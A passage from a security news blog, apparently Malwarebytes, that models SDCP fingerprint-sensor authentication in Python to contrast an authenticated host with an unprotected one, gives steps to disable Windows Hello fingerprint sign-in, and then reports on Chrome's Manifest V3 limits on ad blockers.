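# Constructed key standing in for SDCP's host/sensor secret (key agreement not modelled).
PAIRING_KEY = b"constructed-pairing-key-not-real"

def mac(key, nonce, user):
    return hmac.new(key, nonce + user.encode(), hashlib.sha256).digest()

class Sensor:
    """Match-on-chip side: only the sensor holds the key, so only it can
    authenticate a match result, and only for the nonce the host supplied."""
    def __init__(self, key, enrolled):
        self.key, self.enrolled = key, enrolled  # constructed template -> user
    def match(self, nonce, template):
        user = self.enrolled.get(template)
        if user is None:
            return None
        return {"nonce": nonce, "user": user, "tag": mac(self.key, nonce, user)}

class Host:
    """Laptop side: fresh nonce per attempt; a result is accepted only if its
    MAC covers the current nonce (authenticated, fresh, not replayable)."""
    def __init__(self, key):
        self.key, self.pending = key, None
    def begin_auth(self):
        self.pending = secrets.token_bytes(32)
        return self.pending
    def accept(self, msg):
        if msg is None or msg["nonce"] != self.pending:
            return False  # unsolicited, stale or replayed message
        self.pending = None  # a nonce is good for exactly one answer
        return hmac.compare_digest(msg["tag"], mac(self.key, msg["nonce"], msg["user"]))

def host_without_sdcp(msg):
    """SDCP absent or disabled: any cleartext 'matched' message is believed."""
    return msg is not None and msg.get("user") is not None

def genuine_login(host, sensor):
    return host.accept(sensor.match(host.begin_auth(), "template-alice"))

def spoofed_device(host):  # impersonator without the key can only guess the tag
    return host.accept({"nonce": host.begin_auth(), "user": "alice", "tag": bytes(32)})

def replayed_message(host, sensor):
    msg = sensor.match(host.begin_auth(), "template-alice")
    host.accept(msg)         # first delivery is accepted
    host.begin_auth()        # new attempt, new nonce
    return host.accept(msg)  # captured message is rejected
```

The contrast between `Host.accept` and `host_without_sdcp` is the whole point of the researchers’ recommendation: the same spoofed message that `Host` rejects is accepted without question when the channel is not authenticated.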

The fact that three manufacturers were mentioned by name doesn’t mean by any stretch that others have done a better job. It just means the researchers didn’t get round to testing them.

If you, as a user, are worried about anyone being able to get near your laptop with a USB device, you shouldn’t be using fingerprints as an authentication method, and you should disable it:

Type and search [Sign-in options] in the Windows search bar, then click [Open].

Select [Fingerprint recognition (Windows Hello)], then click [Remove], and the fingerprint sign-in option will be removed.

Until the manufacturers have dealt with the weaknesses in their setups, we can’t assume that this is a secure method of authentication.


Chrome pushes forward with plans to limit ad blockers in the future

Google has announced it will shut down Manifest V2 in June 2024 and move on to Manifest V3, the latest version of its Chrome extension specification, which has faced criticism for putting limits on ad blockers. Roughly speaking, Manifest V2 and V3 are the rules that browser extension developers have to follow if they want their extensions to get accepted into the Google Play Store.

Manifest V2 is the old model. The Chrome Web Store no longer accepts Manifest V2 extensions, but browsers can still use them. For now. Manifest V3 is supported generally in Chrome 88 or later and will be the standard after the transition planned to take place in June 2024.

A popular type of browser extension is the ad blocker. Almost all ad blockers work with block lists, which are long lists of domains, subdomains, and IP addresses that they filter out of your web traffic. These lists are commonly referred to as rulesets. One part of the transition will “improve” content filtering. And to be fair, Google has made some compromises in the version as it’s now planned, compared to what it originally intended to do.

Originally, each extension could offer users a choice of 50 static rulesets, and 10 of these rulesets could be enabled simultaneously. This changes to 50 rulesets enabled simultaneously and 100 in total.

Extensions could add up to 5,000 rules dynamically, which encouraged using this functionality sparingly and made it easier for Google to detect abuse. Extensions can add rules dynamically to support more frequent updates and user-defined rules. But this comes with the risk of phishing or data theft, because these “updates” are not checked during the Chrome Web Store review. For example, a redirect rule could be abused to inject affiliate links without consent. But Google has decided that block and allow rules are not that easily abused, so it will allow up to 30,000 such rules to be added dynamically.

However, this is still far from enough to fully reach the potential of the best ad blockers we have now. And it’s not just the hard limits on filtering rulesets; there are a lot of other new limits on filtering. Items can’t be filtered based on the response headers or according to the URL in the address bar. Extension developers are also limited in what regular expressions they can use, along with other technical limitations.

Even if this is not targeted at ad blockers specifically, it’s still a major change that makes blocking requests less flexible. The bottom line is that it limits the API that many ad blockers use and replaces it with a less capable one.

Google will tell you that by limiting extensions, the browser can be lighter on resources and that Google can protect your privacy from extension developers; it calls the change “a step in the direction of privacy, security, and performance.” The Electronic Frontier Foundation (EFF), however, calls Manifest V3 deceitful and threatening.

“Manifest V3 is another example of the inherent conflict of interest that comes from Google controlling both the dominant web browser and one of the largest internet advertising networks.”

Under the new specifications, browser extensions that monitor and filter the web traffic between the browser and the website will have greatly reduced capabilities. This includes ad blockers and privacy-protective tracker blockers. No real surprise, considering Google has trackers installed on 75% of the top one million websites.

According to Firefox’s Add-on Operations Manager, most malicious extensions that manage to get through the security review process are usually interested in simply observing the conversation between your browser and whatever websites you visit. The malicious activity happens elsewhere, after the data has already been read. So in their view, what would really help security is a more thorough review process, but that’s not something Google says it has plans for.

After looking at the arguments Google used to justify this transition, Ars Technica came to the conclusion that there’s no justification for arbitrarily limiting the list of filter rules. It says that once Manifest V3 happens, Chrome users will be limited to light ad blocker functionality, while users who want the full extension functionality will need to switch to Firefox or some other non-limited browser.

Nevertheless, Firefox said it will adopt Manifest V3 in the interest of cross-browser compatibility. And Chrome’s market share will certainly have influenced that decision as well.

Google Chrome Enterprise users with the “ExtensionManifestV2Availability” policy turned on will get an extra year of Manifest V2 compatibility.

If you want to help Malwarebytes get ready for the transition, you can test the beta version of Browser Guard for Manifest V3.
